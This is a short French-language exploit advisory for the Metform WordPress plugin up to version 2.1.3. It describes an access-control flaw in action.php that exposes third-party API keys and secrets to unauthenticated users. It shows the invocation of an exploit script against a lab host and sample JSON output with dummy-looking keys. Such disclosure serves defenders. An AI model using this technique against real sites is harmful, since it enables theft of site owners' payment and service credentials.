
WordPress Plugin Metform <= 2.1.3 - Contrôle d'accès inapproprié permettant la divulgation non authentifiée d'informations sensibles
WordPress Plugin Metform <= 2.1.3 - Contrôle d'accès inadéquat permettant la divulgation non authentifiée d'informations sensibles
Il est vulnérable à la divulgation d'informations sensibles en raison d'un contrôle d'accès inadéquat dans le fichier ~/core/forms/action.php, qui peut être exploitée par un attaquant non authentifié pour voir toutes les clés API et secrets des API tierces intégrées telles que PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA, etc.
bash metform.sh http://wordpress.lan
{
"form_title": "New Form # 1691056894",
"success_message": "Thank you! Form submitted successfully.",
"capture_user_browser_data": "1",
"store_entries": "1",
"entry_title": "Entry # [mf_id]",
"count_views": "1",
"redirect_to": "",
"user_email_subject": "",
"user_email_from": "",
"user_email_reply_to": "",
"user_email_body": "",
"admin_email_subject": "",
"admin_email_to": "",
"admin_email_from": "",
"admin_email_reply_to": "",
"admin_email_body": "",
"mf_mailchimp_list_id": "",
"mf_slack_webhook": "",
"mf_recaptcha_version": "recaptcha-v2",
"mf_recaptcha_site_key": "sfsdffd",
"mf_recaptcha_secret_key": "sfddsf",
"mf_recaptcha_site_key_v3": "",
"mf_recaptcha_secret_key_v3": "",
"mf_mailchimp_api_key": "asdadasdsaddas",
"input_names": "Example: [mf-inputname]",
"ckit_opt": [],
"aweber_opt": [],
"mp_opt": []
}